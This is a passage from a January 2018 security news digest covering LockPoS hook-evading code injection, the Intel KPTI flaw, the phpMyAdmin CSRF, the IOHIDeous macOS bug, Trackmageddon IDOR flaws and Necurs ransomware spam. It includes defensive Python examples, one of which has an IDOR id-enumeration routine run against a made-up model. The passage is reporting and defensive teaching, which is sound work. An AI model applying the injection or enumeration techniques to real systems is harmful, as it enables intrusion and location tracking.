The malware is now employing an injection method that appears to be a new variant of a technique previously employed by the Flokibot PoS malware. With LockPoS distributed from the Flokibot botnet, and with the two threats sharing similarities, this doesn’t come as a surprise.

One of the injection techniques employed by LockPoS involves creating a section object in the kernel, calling a function to map a view of that section into another process, then copying code into the section and creating a remote thread to execute the mapped code, Cyberbit says.

LockPoS was observed using 3 main routines to inject code into a remote process, namely NtCreateSection, NtMapViewOfSection, and NtCreateThreadEx, all three exported from ntdll.dll, a core Dynamic-link library (DLL) file in the Windows operating system.

Rather than calling those routines through the copy of ntdll.dll already loaded in its process, the malware maps a fresh copy of ntdll.dll from disk into its own virtual address space and so obtains a “clean” copy of the DLL. It allocates a buffer in which it stores the system call numbers taken from that copy, copies its malicious code into the shared mapped section, and then creates a remote thread in explorer.exe to execute it.

By using this “silent” malware injection method, the malware can avoid any hooks that anti-malware software might have installed on ntdll.dll, thus increasing the chances of a successful attack.

“This new malware injection technique suggests a new trend could be developing of using old sequences in a new way that makes detection difficult,” Hod Gavriel, malware analyst at Cyberbit, explains.

While most endpoint detection and response (EDR) and next-generation antivirus products already monitor the relevant Windows functions in user mode, the kernel-mode functions these system calls reach cannot be hooked on Windows 10, where the kernel remains guarded against such patching. To detect this technique, the researcher says, products need better memory analysis.


VMware Patches Critical Flaws in vSphere Data Protection
3.1.2018 securityweek
Vulnerebility
VMware has patched three critical vulnerabilities in vSphere Data Protection (VDP), including arbitrary file upload, authentication bypass and path traversal issues.

vSphere Data Protection is a backup and recovery solution for vSphere environments. VMware stopped offering the product in April 2017, but will continue to provide general support for version 6.x until 2020 and technical guidance until 2022.

VMware published a security advisory on Tuesday to inform VDP customers that critical vulnerabilities have been found in versions 5.x, 6.0.x and 6.1.x of the product. VMware has not credited anyone for discovering the weaknesses.

One of the flaws, tracked as CVE-2017-15548, allows an unauthenticated attacker to remotely bypass authentication and gain root access to a vulnerable system. Another bug, identified as CVE-2017-15549, allows a remote attacker with access to a low-privileged account to upload malicious files to any location on the server file system.

The last vulnerability is a path traversal tracked as CVE-2017-15550. It allows an authenticated attacker with low privileges to access arbitrary files on the server in the context of the vulnerable application.

The security holes have been patched with the release of VDP 6.1.6 and 6.0.7. Users of version 5.x have been advised to update to version 6.0.7 or newer.

This is only the third security advisory published by VMware for VDP. Another advisory was released last year to alert users of critical Java deserialization and credentials encryption issues, and one was published in late 2016 for an SSH key-based authentication flaw.


Mitigations Prepared for Critical Vulnerability in Intel CPUs
3.1.2018 securityweek
Vulnerebility
Researchers have apparently discovered a serious vulnerability affecting all Intel CPUs. Software-level mitigations have already been developed, but they could cause significant performance penalties.

Details of the vulnerability are expected to become available on January 9. The impact of the flaw is comparable to the notorious Heartbleed bug, but an attack is said to be more practical.

The existence of the security hole came to light following the introduction of kernel page table isolation (KPTI) in Linux. A similar feature is being implemented by Microsoft in Windows and Apple is also expected to make some changes in macOS. Experts believe it will not be easy for Intel to address the problem directly in its processors.

[Image: Vulnerability Impacts Intel Chips]

KPTI is a hardening technique designed to improve security by isolating kernel-space memory from user-space memory. It is based on the KAISER system developed last year by a team of researchers at the Graz University of Technology in Austria. KAISER was designed to shore up kernel address space layout randomization (KASLR), a mitigation that makes control-flow hijacking and code injection attacks harder by hiding where the kernel is located.

Back in July 2017, researcher Anders Fogh shared some thoughts on how it may be possible to read kernel memory from an unprivileged process via speculative execution. While his attempts were unsuccessful, his work did yield some results. Some believe that researchers at Graz University – Fogh has previously collaborated with Graz University researchers on memory-related attacks – may have found a way to make it work.

Gaining access to the kernel space poses serious risks as this memory can include highly sensitive information.

AMD says its processors are not vulnerable to the type of attacks mitigated by KPTI, but the company does mention speculative execution.

“The AMD microarchitecture does not allow memory references, including speculative references, that access higher privileged data when running in a lesser privileged mode when that access would result in a page fault,” an AMD representative explained.

Cloud services from Microsoft, Amazon and Google are apparently impacted by the Intel hardware vulnerability - Amazon Web Services (AWS) and Microsoft Azure have informed customers of upcoming security updates that will require a reboot of their cloud instances. A developer who writes on the blog Python Sweetness speculated that the flaw could allow privilege escalation attacks against hypervisors.

As for the impact of the KPTI mitigation on performance, tests conducted by Grsecurity showed an impact of up to 35%, but it depends a great deal on what type of operations are being carried out. Tests done by Phoronix showed that gaming performance on Linux does not appear to be affected by the PTI changes in the kernel.

“Performance penalties from single to double digits are expected on patched kernels,” explained Michael Larabel, founder of Phoronix. “The penalty depends upon how much interaction the application/workload deals with the kernel if there's a lot of context switching and other activity. If it's a simple user-space application not doing much, the x86 PTI additions shouldn't cause much of an impact. Newer Intel CPUs with PCID should also help in ensuring less of a performance impact.”

The developers of the KAISER system claimed that the method has a negative impact of only 0.28%.


Intel Makes a Mistake in The CPU Design, Windows and Linux Scramble to Fix It
3.1.2018 securityaffairs
Vulnerebility

It is suspected that the flaw lies in the way Intel CPUs manage memory between “kernel mode” and “user mode.”
Competition between IT hardware manufacturers is fierce. Decimal point differences in performance specs translate into millions of dollars won or lost with every chip release. Manufacturers are very creative at finding ways to gain an edge over their competition, and sometimes the creativity works against them. This appears to be the case with Intel’s CPUs, and in the worst case, it affects anyone who relies on Intel chips for virtualization — most companies, and cloud providers like Microsoft Azure, Amazon EC2, Google Compute Engine. It is up to operating system manufacturers to fix the problem and the fix will hurt performance.

Details of the security vulnerability are under embargo from Intel in an attempt to give developers time to come up with a fix, so much of the reporting on the bug is extrapolated from online discussions and from dissecting the Linux patches that were quickly rolled out in December.

It is suspected that the flaw is in the way an Intel CPU manages memory between “kernel mode” and “user mode.” Think of all the programs running on a computer at the same time. For security and stability reasons we want to be sure that one program doesn’t negatively impact another program. For example, if your browser crashes you don’t want it to take down the entire computer by crashing the OS.

In a virtualized cloud environment, you don’t want someone else’s program to be able to see the details of what you are running in your portion of the cloud. To accomplish this isolation, individual programs are run in their own “user space.” However, these programs still share hardware such as network connections and hard drives, so another layer is required: kernel mode coordinates requests for shared hardware while maintaining isolation between the various user-mode programs. When microseconds affect your performance metrics, the “cost” of entering kernel mode to execute a request, then leaving kernel mode and returning to user mode, is “expensive.” As described in The Register article, Intel attempted a shortcut: “To make the transition from user mode to kernel mode and back to user mode as fast and efficient as possible, the kernel is present in all processes’ virtual memory address spaces, although it is invisible to these programs. When the kernel is needed, the program makes a system call, the processor switches to kernel mode and enters the kernel. When it is done, the CPU is told to switch back to user mode, and re-enter the process.”

[Image: Intel chip]

Although memory for each user process is well isolated, it is believed that the Intel flaw allows for these user processes to exploit kernel memory space to violate the intended isolation.

Many operating systems use a security control called Kernel Address Space Layout Randomization (KASLR), which randomizes where the kernel sits in memory so that a user process cannot reliably locate kernel code and data (Daniel López Azaña has a good summary of ASLR, KASLR and KARL.) However, in October 2017 the KAISER patch series reached the Linux kernel developers and hinted at the current Intel CPU issue; it is detailed in the LWN article “KAISER: hiding the kernel from user space.” Then in December, a number of Linux distributions released kernel updates including Kernel Page-Table Isolation (PTI), which unmaps almost all of the kernel from a process’s page tables while it runs in user mode. On December 26, 2017, Intel’s competitor AMD sent this email to the Linux kernel mailing list:

"AMD processors are not subject to the types of attacks that the kernel
page table isolation feature protects against. The AMD microarchitecture
does not allow memory references, including speculative references, that
access higher privileged data when running in a lesser privileged mode
when that access would result in a page fault."
All of this activity seems to point squarely at a problem in the way that Intel CPUs isolate, or fail to isolate, kernel memory from user processes. But while under the embargo it is all educated guessing.

Major Linux distributions have released kernel updates to address the issue and Microsoft is expected to release corresponding patches in January’s patch bundle. There are rumors that Microsoft Azure and Amazon Web Services customers have been notified directly of impending maintenance outages this month which might be associated with patches for this Intel bug. Since the kernel mode shortcut was intended to improve CPU performance, you should expect that the fix will negatively impact current performance. We will have to wait for the Intel information embargo to be lifted, and for the Linux and Windows patches to be applied to truly understand the risks and performance impacts.


Marketing companies have started exploiting a flaw in browsers’ built-in password managers to track users
3.1.2018 securityaffairs
Vulnerebility

A group of researchers discovered marketing companies have started exploiting an 11-year-old vulnerability in browsers’ built-in password managers to track visitors.
A group of researchers from Princeton’s Center for Information Technology Policy has discovered that at least two marketing companies, AdThink and OnAudience, are exploiting an 11-year-old vulnerability in major browsers to track visitors.

The marketing firms exploit the flaw in browsers’ built-in password managers to secretly collect email addresses. The gathered data lets them target advertising across different browsers and devices.

[Image: password-manager tracking]

Of course, the same flaw could be exploited by threat actors to steal saved login credentials from browsers without requiring any user interaction.
Every major browser (Google Chrome, Mozilla Firefox, Microsoft Edge, and Opera) implements a built-in password manager that allows users to save login information for automatic form-filling.

The researchers from Princeton’s Center for Information Technology Policy discovered that both AdThink and OnAudience are exploiting the built-in password managers to track visitors of around 1,110 of the Alexa top 1 million sites across the Internet.

“We found two scripts using this technique to extract email addresses from login managers on the websites which embed them. These addresses are then hashed and sent to one or more third-party servers. These scripts were present on 1110 of the Alexa top 1 million sites.” states the analysis of the Princeton’s Center for Information Technology Policy.

The experts found third-party tracking scripts on these websites that inject invisible login forms in the background of the webpage; the password managers are tricked into auto-filling the form with the saved credentials.

The scripts detect the username and send it to third-party servers after hashing it with the MD5, SHA1, and SHA256 algorithms; the hashed values serve as an identifier for a specific user. Trackers typically use the hashed email address as the user’s ID.

“Login form autofilling in general doesn’t require user interaction; all of the major browsers will autofill the username (often an email address) immediately, regardless of the visibility of the form.” continue the researchers.

“Chrome doesn’t autofill the password field until the user clicks or touches anywhere on the page. Other browsers we tested don’t require user interaction to autofill password fields.”

[Image: browser password-manager tracking]

“Email addresses are unique and persistent, and thus the hash of an email address is an excellent tracking identifier,” the researchers said. “A user’s email address will almost never change—clearing cookies, using private browsing mode, or switching devices won’t prevent tracking.”
Third-party password managers like LastPass and 1Password are not exposed to this tracking technique because they do not auto-fill invisible forms and require user interaction anyway.

Users can test the tracking technique using a live demo page created by the researchers.

The researchers’ list of sites embedding scripts that abuse the login manager for tracking also includes the website of M5S founder Beppe Grillo (beppegrillo.it).


Necurs botnet involved in massive ransomware campaigns at the end of 2017
3.1.2018 securityaffairs
Ransomware

The Necurs botnet made the headlines at year-end sending out tens of millions of spam emails daily as part of massive ransomware campaigns.
Necurs was inactive for a long period at the beginning of 2017 and resumed its activity in April.

In the past months the Necurs botnet has been used to push many other malware families, including Locky, Jaff, GlobeImposter, Dridex, Scarab and TrickBot.

According to data collected by experts at AppRiver, between December 19 and December 29, 2017, the Necurs botnet was used to distribute ransomware. The crooks used typical holiday-themed scam emails to push both Locky and GlobeImposter; the malicious messages carried .vbs (Visual Basic Script) or .js (JavaScript) files inside a .7z archive.

[Image: Necurs botnet xmas 1220_js_eml]

Starting on Dec. 19, the Necurs botnet was observed sending tens of millions of spam emails daily to distribute ransomware; the peak was reached on December 20 with over 47 million emails (up to 5.7 million per hour).

“On Dec. 19, AppRiver’s filters stopped 45,976,814 malicious emails sent by the Necurs botnet. Maximum traffic for it was a just more than 4.6 million emails per hour. These were all .7z that contained malicious .vbs files leading to an infection.” reads the analysis published by AppRiver.

[Image: Necurs botnet xmas]

Experts noticed that on the first day the operators used only .vbs files inside the .7z archive, while on the second day they also started using .js files.

“On Dec. 21 and 22, the traffic switched back over to the .js files and began to taper off. We saw 36,290,981 and 29,602,971 messages blocked respectively, for those two days, before the botnet went quiet from Dec. 23-25. Today (Dec. 26), Necurs re-awoke from its slumber for a couple hours then went quiet again.” continues the analysis.

“Hard to say why, however, I would hypothesize the operators may have been testing or monitoring the rate of infections and realized many workers are on vacation. As of the time this blog was authored we’ve captured the below statistics for today”

The botnet’s activity increased again on Dec. 28-29: on the first day it peaked at 6.5 million messages early in the morning, and on the next day the Necurs botnet sent out nearly 59 million ransomware messages.


Critical Flaw Reported In phpMyAdmin Lets Attackers Damage Databases
3.1.2018 thehackernews
Vulnerebility
A critical security vulnerability has been reported in phpMyAdmin—one of the most popular applications for managing the MySQL database—which could allow remote attackers to perform dangerous database operations just by tricking administrators into clicking a link.
Discovered by an Indian security researcher, Ashutosh Barot, the vulnerability is a cross-site request forgery (CSRF) attack and affects phpMyAdmin versions 4.7.x (prior to 4.7.7).
Cross-site request forgery (CSRF), also known as XSRF, is an attack in which an attacker tricks an authenticated user into executing an unwanted action.
According to an advisory released by phpMyAdmin, "by deceiving a user to click on a crafted URL, it is possible to perform harmful database operations such as deleting records, dropping/truncating tables, etc."
phpMyAdmin is a free and open source administration tool for MySQL and MariaDB and is widely used to manage the database for websites created with WordPress, Joomla, and many other content management platforms.
Moreover, a lot of hosting providers use phpMyAdmin to offer their customers a convenient way to organize their databases.

Barot has also released a video demonstrating how a remote attacker can make a database admin unknowingly delete (DROP) an entire table just by tricking them into clicking a specially crafted link.
"A feature of phpMyAdmin was using a GET request and after that POST request for Database operations such as DROP TABLE table_name; GET requests must be protected against CSRF attacks. In this case, POST requests were used which were sent through URL (for bookmarking purpose may be); it was possible for an attacker to trick a database admin into clicking a button and perform a drop table database query of the attacker’s choice." Barot explains in a blog post.
However, performing this attack is not as simple as it may sound. To prepare a CSRF URL, the attacker must know the names of the targeted database and table.
"If a user executes a query on the database by clicking insert, DROP, etc. buttons, the URL will contain database name and table name," Barot says. "This vulnerability can result in the disclosure of sensitive information as the URL is stored at various places such as browser history, SIEM logs, Firewall Logs, ISP Logs, etc."
Barot reported the vulnerability to phpMyAdmin developers, who confirmed his finding and released phpMyAdmin 4.7.7 to address this issue. So administrators are highly recommended to update their installations as soon as possible.


15-Year-Old Apple macOS 0-Day Kernel Flaw Disclosed, Allows Root Access
3.1.2018 thehackernews Apple

A security researcher on New Year's eve made public the details of an unpatched security vulnerability in Apple's macOS operating system that can be exploited to take complete control of a system.
On the first day of 2018, a researcher using the online moniker Siguza released the details of the unpatched zero-day macOS vulnerability, which he suggests is at least 15 years old, and proof-of-concept (PoC) exploit code on GitHub.
The bug is a serious local privilege escalation (LPE) vulnerability that could enable an unprivileged user (attacker) to gain root access on the targeted system and execute malicious code. Malware designed to exploit this flaw could fully install itself deep within the system.
From looking at the source, Siguza believes this vulnerability has been around since at least 2002, but some clues suggest the flaw could actually be ten years older than that. "One tiny, ugly bug. Fifteen years. Full system compromise," he wrote.
This local privilege escalation flaw resides in IOHIDFamily, an extension of the macOS kernel which has been designed for human interface devices (HID), like a touchscreen or buttons, allowing an attacker to install a root shell or execute arbitrary code on the system.
"IOHIDFamily has been notorious in the past for the many race conditions it contained, which ultimately lead to large parts of it being rewritten to make use of command gates, as well as large parts being locked down by means of entitlements," the researcher explains.
"I was originally looking through its source in the hope of finding a low-hanging fruit that would let me compromise an iOS kernel, but what I didn’t know it then is that some parts of IOHIDFamily exist only on macOS - specifically IOHIDSystem, which contains the vulnerability."
The exploit created by Siguza, which he dubbed IOHIDeous, affects all versions of macOS and turns the bug into an arbitrary read/write primitive in the kernel.
Besides this, IOHIDeous also disables the System Integrity Protection (SIP) and Apple Mobile File Integrity (AMFI) security features that offer protection against malware.
The PoC code made available by Siguza has for some reason stopped working on macOS High Sierra 10.13.2 and works on macOS High Sierra 10.13.1 and earlier, but he believes the exploit code can be tweaked to work on the latest version as well.
However, the researcher pointed out that for his exploit to work it needs to force the logged-in user to log out; this can be arranged by having the exploit run when the targeted machine is manually shut down or rebooted.
Since the vulnerability only affects macOS and is not remotely exploitable, the researcher decided to publish his findings online instead of reporting them to Apple. For those unaware, Apple's bug bounty program does not cover macOS bugs.
For in-depth technical details about the vulnerability, you can head on to researcher's write-up on GitHub.


Flaw In Major Browsers Allows 3rd-Party Scripts to Steal Your Saved Passwords
3.1.2018 thehackernews
Vulnerebility

Security researchers have uncovered how marketing companies have started exploiting an 11-year-old bug in browsers' built-in password managers that allows them to secretly collect your email address for targeted advertising across different browsers and devices.
The major concern is that the same loophole could allow malicious actors to steal your saved usernames and passwords from browsers without requiring your interaction.
Every modern browser—Google Chrome, Mozilla Firefox, Opera or Microsoft Edge—today comes with a built-in easy-to-use password manager tool that allows you to save your login information for automatic form-filling.
These browser-based password managers are designed for convenience, as they automatically detect login form on a webpage and fill-in the saved credentials accordingly.
However, a team of researchers from Princeton's Center for Information Technology Policy has discovered that at least two marketing companies, AdThink and OnAudience, are actively exploiting such built-in password managers to track visitors of around 1,110 of the Alexa top 1 million sites across the Internet.
Third-party tracking scripts found by researchers on these websites inject invisible login forms in the background of the webpage, tricking browser-based password managers into auto-filling the form using the saved user's information.
"Login form auto filling in general doesn't require user interaction; all of the major browsers will autofill the username (often an email address) immediately, regardless of the visibility of the form," the researchers say.
"Chrome doesn't autofill the password field until the user clicks or touches anywhere on the page. Other browsers we tested don't require user interaction to autofill password fields."

Since these scripts are primarily designed for user-tracking, they detect the username and send it to third-party servers after hashing with MD5, SHA1 and SHA256 algorithms, which could then be used as a persistent ID for a specific user to track him/her from page to page.
"Email addresses are unique and persistent, and thus the hash of an email address is an excellent tracking identifier," the researchers said. "A user's email address will almost never change—clearing cookies, using private browsing mode, or switching devices won't prevent tracking."
Although the researchers have only seen marketing firms scooping up usernames with such tracking scripts, nothing technical prevents the same scripts from collecting passwords the same way.
However, most third-party password managers, like LastPass and 1Password, are not prone to this attack, since they avoid auto-filling invisible forms and require user interaction as well.
Researchers have also created a demo page, where you can test if your browser's password manager also leaks your username and password to invisible forms.
The simplest way to prevent such attacks is to disable the autofill function on your browser.
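The technique above can be checked for on a page's own markup. The following is an added example (not code from the Princeton study, the trackers, or any browser vendor): a small parser built on Python's standard library that walks an HTML document and reports every form carrying a password field that is nevertheless hidden from the user, which is exactly the shape of form a browser's autofill still populates. The sample page, the hiding heuristics (inline `display:none`, `visibility:hidden`, `opacity:0`, a large negative offset, or the `hidden` attribute) and the form ids are constructed for illustration; forms hidden through an external stylesheet would need the stylesheet as well.

```python
"""Find invisible login forms of the kind the tracking scripts inject.

Added example (not code from the Princeton study or from any tracker): it
walks an HTML document and reports every <form> that contains a password
field yet is hidden from the user (display:none, visibility:hidden,
opacity:0, a negative off-screen offset, or the `hidden` attribute), which is
the shape of form a browser will still auto-fill. The sample page and the
hiding heuristics are constructed for illustration.
"""
import re
from html.parser import HTMLParser

# Inline-style fragments that hide an element and everything inside it.
# Assumed heuristics; real trackers may also hide forms via CSS classes or
# zero-size boxes, which an offline parser cannot resolve without the stylesheet.
HIDDEN_STYLE = re.compile(
    r"display\s*:\s*none|visibility\s*:\s*hidden|opacity\s*:\s*0(?![.\d])"
    r"|(?:left|top)\s*:\s*-\d{3,}px",
    re.IGNORECASE,
)
VOID = {"input", "img", "br", "hr", "meta", "link"}  # elements with no end tag


class HiddenFormFinder(HTMLParser):
    def __init__(self):
        super().__init__()
        self.stack = []     # open elements as (tag, subtree_is_hidden)
        self.forms = []     # open <form> records
        self.findings = []  # closed forms that look like autofill traps

    @staticmethod
    def _hidden(attrs):
        return "hidden" in attrs or bool(HIDDEN_STYLE.search(attrs.get("style") or ""))

    def handle_startendtag(self, tag, attrs):
        self.handle_starttag(tag, attrs)  # <input .../> is handled like <input ...>

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        # Hidden if any ancestor is hidden, or this element hides itself.
        hidden = any(h for _, h in self.stack) or self._hidden(attrs)
        if tag == "form":
            self.forms.append({"id": attrs.get("id"), "hidden": hidden,
                               "password": False, "username": False,
                               "hidden_password": False})
        elif tag == "input" and self.forms:
            kind = (attrs.get("type") or "text").lower()
            form = self.forms[-1]
            if kind == "password":
                form["password"] = True
                form["hidden_password"] |= hidden
            elif kind in ("text", "email"):
                form["username"] = True
        if tag not in VOID:
            self.stack.append((tag, hidden))

    def handle_endtag(self, tag):
        if tag in VOID:
            return
        for i in range(len(self.stack) - 1, -1, -1):
            if self.stack[i][0] == tag:
                del self.stack[i:]
                break
        if tag == "form" and self.forms:
            form = self.forms.pop()
            # A visible form with a password field is a normal login; the trap is
            # a password field the user cannot see but the browser still fills.
            if form["password"] and (form["hidden"] or form["hidden_password"]):
                self.findings.append(form)


def find_hidden_login_forms(html):
    """Return the ids of forms that carry a password field but are invisible."""
    parser = HiddenFormFinder()
    parser.feed(html)
    parser.close()
    return [f["id"] for f in parser.findings]


# Constructed page: one real login form, two injected traps, one harmless form.
SAMPLE_PAGE = """
<html><body>
<form id="real-login" action="/login" method="post">
  <input type="email" name="user"><input type="password" name="pass">
</form>
<div style="display:none">
  <form id="tracker-a"><input type="text" name="u"><input type="password" name="p"></form>
</div>
<form id="tracker-b" style="position:absolute; left:-5000px">
  <input type="email" name="email"><input type="password" name="pw">
</form>
<form id="newsletter"><input type="email" name="email"></form>
</body></html>
"""

if __name__ == "__main__":
    print("hidden login forms:", find_hidden_login_forms(SAMPLE_PAGE))
```

Run against the sample page it reports `tracker-a` and `tracker-b` and leaves the visible login and the newsletter form alone. The same visibility test is what the third-party managers mentioned above apply before filling; a browser that filled only forms passing such a check would not be trackable this way.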


Many GPS Tracking Services Expose User Location, Other Data
3.1.2018 securityweek Privacy
Researchers discovered that many online services designed for managing location tracking devices are affected by vulnerabilities that expose potentially sensitive information.

Fitness, child, pet and vehicle trackers, and other devices that include GPS and GSM tracking capabilities are typically managed via specialized online services.

Security experts Vangelis Stykas and Michael Gruhn found that over 100 such services have flaws that can be exploited by malicious actors to gain access to device and personal data. The security holes, dubbed Trackmageddon, can expose information such as current location, location history, device model and type, serial number, and phone number.

Some services used by devices that have photo and audio recording capabilities also expose images and audio files. In some cases, it’s also possible to send commands to devices in order to activate or deactivate certain features, such as geofence alerts.

Attackers can gain access to information by exploiting default credentials (e.g. 123456), and insecure direct object reference (IDOR) flaws, which allow an authenticated user to access other users’ accounts simply by changing the value of a parameter in the URL. The services also expose information through directory listings, log files, source code, WSDL files, and publicly exposed API endpoints that allow unauthenticated access.

Stykas and Gruhn notified the vast majority of the affected vendors in November and December. Nine services have confirmed patching the flaws or promised to implement fixes soon, and over a dozen websites appear to have addressed the vulnerabilities without informing the researchers. The rest of the tracking services, however, remain vulnerable.

There are roughly 100 impacted domains, but some of them appear to be operated by the same company. Researchers have identified 36 unique IPs hosting these domains and 41 databases that they share. They estimate that these services expose data associated with over 6.3 million devices and more than 360 device models.

The vulnerable software appears to come from China-based ThinkRace, but in many cases the company does not have control over the servers hosting the tracking services.

Gruhn and Stykas pointed out that vulnerabilities in ThinkRace products – possibly including some of the issues disclosed now – were first discovered in 2015 by a New Zealand-based expert while analyzing car tracking and immobilisation devices that relied on ThinkRace software.

Users of the online tracking services that remain vulnerable have been advised to change their password and remove any potentially sensitive information stored in their account. However, these are only partial solutions to the problem and researchers have advised people to simply stop using affected devices until patches are rolled out.
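The IDOR class of flaw described above comes down to one missing check. The following is an added example, not code from any of the affected services or from the researchers: a minimal in-memory model of a tracker-management API with the vulnerable lookup (any logged-in user can read any device by changing the id) beside the fixed one (the object must belong to the caller), plus the id-walking routine an attacker with a single account would use. The device table, session ids, model names and coordinates are constructed.

```python
"""IDOR in a tracker-management API: the vulnerable lookup beside a fixed one.

Added example, not code from any of the affected services. The device table,
sessions and ownership model below are constructed for illustration; the point
is the one-line difference between "is the caller logged in?" and "does the
caller own this object?".
"""

# Constructed state: two users, each with one tracker. The service stores the
# kind of data Trackmageddon exposed (model, identifiers, last position).
DEVICES = {
    1001: {"owner": "alice", "model": "TK-102", "imei": "000000000000001",
           "last_fix": (52.52, 13.40)},
    1002: {"owner": "bob", "model": "GT-06", "imei": "000000000000002",
           "last_fix": (48.86, 2.35)},
}
SESSIONS = {"sess-alice": "alice", "sess-bob": "bob"}


class Unauthenticated(Exception):
    pass


class Forbidden(Exception):
    pass


def vulnerable_get_device(session_id, device_id):
    """GET /device/<id> as many of the services implement it.

    The only check is that *a* session exists; the id from the URL is trusted.
    """
    if session_id not in SESSIONS:
        raise Unauthenticated()
    return DEVICES[device_id]  # any logged-in user can read any device


def hardened_get_device(session_id, device_id):
    """Same lookup with an ownership check on the object, not just the session."""
    user = SESSIONS.get(session_id)
    if user is None:
        raise Unauthenticated()
    device = DEVICES.get(device_id)
    # One response for "does not exist" and "not yours", so the endpoint does not
    # double as an oracle for which ids are valid.
    if device is None or device["owner"] != user:
        raise Forbidden()
    return device


def enumerate_devices(session_id, lookup, id_range=range(1000, 1010)):
    """What one valid account can reach by walking the id space with `lookup`."""
    reachable = {}
    for device_id in id_range:
        try:
            reachable[device_id] = lookup(session_id, device_id)["last_fix"]
        except (KeyError, Forbidden):
            continue
    return reachable


if __name__ == "__main__":
    print("vulnerable:", enumerate_devices("sess-bob", vulnerable_get_device))
    print("hardened:  ", enumerate_devices("sess-bob", hardened_get_device))
```

With Bob's session the vulnerable handler hands back Alice's last position as well as his own; the hardened one returns only his. Note that the fix is an authorization check on the object, not a longer or less guessable id: sequential device ids are fine once every lookup is tied to the owner.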


Critical Vulnerability Patched in phpMyAdmin
3.1.2018 securityweek Vulnerability
An update released just before the holidays by the developers of phpMyAdmin patches a serious vulnerability that can be exploited to perform harmful database operations by getting targeted administrators to click on specially crafted links.

phpMyAdmin is a free and open source tool designed for managing MySQL databases over the Internet. With more than 200,000 downloads every month, phpMyAdmin is one of the top MySQL database administration tools.

India-based researcher Ashutosh Barot discovered that phpMyAdmin is affected by a cross-site request forgery (CSRF) flaw that can be exploited by an attacker to drop tables, delete records, and perform other database operations.

For the attack to work, an authenticated admin needs to click on a specially crafted URL. Barot noted that the attack also works as long as the user is still logged in to the cPanel web hosting interface, even if phpMyAdmin itself has been closed after use.

These types of attacks are possible due to the fact that vulnerable versions of phpMyAdmin use GET requests for database operations, but fail to provide CSRF protection.

The researcher also discovered that the URLs associated with database operations performed via phpMyAdmin are stored in the web browser history, which can pose security risks.

“The URL will contain database name and table name as a GET request was used to perform DB operations,” Barot said in a blog post published on Friday. “URLs are stored at various places such as browser history, SIEM logs, firewall logs, ISP logs, etc. This URL is always visible at client side, it can be a serious issue if you are not using SSL (some information about your previous queries were stored in someone’s logs!). Wherever the URL is being saved, an adversary can gain some information about your database.”

phpMyAdmin developers fixed the CSRF vulnerability found by Barot with the release of version 4.7.7. All prior 4.7.x versions are impacted by the security hole, which phpMyAdmin has classified as “critical.” Users have been advised to update their installations or apply the available patch.


Necurs Botnet Fuels Massive Year-End Ransomware Attacks
3.1.2018 securityweek Ransomware
The Necurs botnet started 2017 with a four-month vacation, but ended the year sending tens of millions of spam emails daily as part of massive ransomware distribution campaigns.

Considered the largest spam botnet at the moment, Necurs was the main driver behind the rise of the Locky ransomware (which in turn is associated with the Dridex banking Trojan) in 2016. As Necurs took a long vacation in the beginning of 2017, Locky was silent as well, but both resumed activity in April.

Over the course of 2017, however, the botnet was involved in the distribution of the Jaff, GlobeImposter, and Scarab ransomware families, as well as in 'pump-and-dump' schemes.

Over a 10-day period between December 19 and December 29, 2017, Necurs was once again involved in the distribution of ransomware, in addition to sending typical holiday-themed scam emails, data collected by AppRiver reveals.

The messages, AppRiver says, were distributing the Locky and GlobeImposter ransomware families and revealed the attackers’ preference to use malicious .vbs (Visual Basic Script) or .js (JavaScript) files located inside a .7z archive.

Consisting of between 5 and 6 million infected hosts and keeping around 1 or 2 million of them active at any given time, Necurs provides operators with remote access to the infected machines and can be used for various malicious activities, including malware downloads.

Starting on Dec. 19, the botnet was observed sending tens of millions of spam emails daily to distribute ransomware. It started at nearly 46 million emails on the first day (peaking at over 4.6 million messages per hour) and continued with over 47 million messages on Dec. 20 (peaking at 5.7 million per hour).

While the initial spam featured mainly .vbs files inside the .7z archive, .js files started appearing as well on the second day, and the traffic switched to .js files on Dec. 21-22, when it also started to taper off, at 36 million and 29 million messages per day, respectively. The botnet remained quiet from Dec. 23-25 and recommenced activity for only a couple of hours on Dec. 26.

“Hard to say why, however, I would hypothesize the operators may have been testing or monitoring the rate of infections and realized many workers are on vacation,” AppRiver’s David Pickett notes.

On Dec. 28-29, however, the botnet was highly active. It peaked at 6.5 million messages early morning on Dec. 28, but wasn’t active for long. On the next day, Necurs was observed sending nearly 59 million ransomware messages.

The malicious emails, the security researchers reveal, were masquerading as purchase orders and voicemails, but also claimed to contain images of interest to the intended victims.
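The lure shape AppRiver describes (a script file inside an archive, attached to a voicemail or purchase-order themed message) is something a mail gateway can decide on by content. The following is an added example, not AppRiver's code or a real Necurs sample: it builds a constructed message with that shape using the standard library, then runs a triage routine that identifies archives by magic bytes rather than by extension, opens zip attachments and blocks those carrying script members, and quarantines 7z archives (which the standard library cannot unpack) for sandbox detonation. The sender, recipient, filenames and the one-line script stub are made up.

```python
"""Attachment triage for the archive-plus-script lure Necurs was sending.

Added example (not AppRiver's code or any real Necurs sample): it builds a
constructed message with the same shape as the December 2017 lures, then runs
a gateway-style check that opens zip attachments and flags script members, and
quarantines 7z archives it cannot open with the standard library. Sender,
recipient, filenames and the script body are made up.
"""
import io
import os
import zipfile
from email import policy
from email.message import EmailMessage
from email.parser import BytesParser

SCRIPT_EXTS = {".js", ".jse", ".vbs", ".vbe", ".wsf", ".hta"}
ZIP_MAGIC = b"PK\x03\x04"
SEVENZIP_MAGIC = b"7z\xbc\xaf\x27\x1c"


def build_sample_mail():
    """Constructed lure: a voicemail-themed zip holding a .js downloader stub."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as archive:
        # Harmless stand-in for the downloader; it only names the object.
        archive.writestr("Voice Message 2017-12-28.js",
                         "var sh = 'WScript.Shell'; // constructed stub, does nothing")
    msg = EmailMessage()
    msg["From"] = "voicemail@example.invalid"
    msg["To"] = "finance@example.invalid"
    msg["Subject"] = "New voice message"
    msg.set_content("You have a new voice message, see attachment.")
    msg.add_attachment(buf.getvalue(), maintype="application", subtype="zip",
                       filename="voicemail.zip")
    # A 7z body we cannot unpack here: magic bytes followed by filler.
    msg.add_attachment(SEVENZIP_MAGIC + b"\x00" * 32, maintype="application",
                       subtype="x-7z-compressed", filename="PO_4471.7z")
    msg.add_attachment(b"%PDF-1.4\n%constructed", maintype="application",
                       subtype="pdf", filename="terms.pdf")
    return msg.as_bytes()


def _ext(name):
    return os.path.splitext(name)[1].lower()


def triage(raw_message):
    """Return (filename, verdict, reason) for every attachment in the message."""
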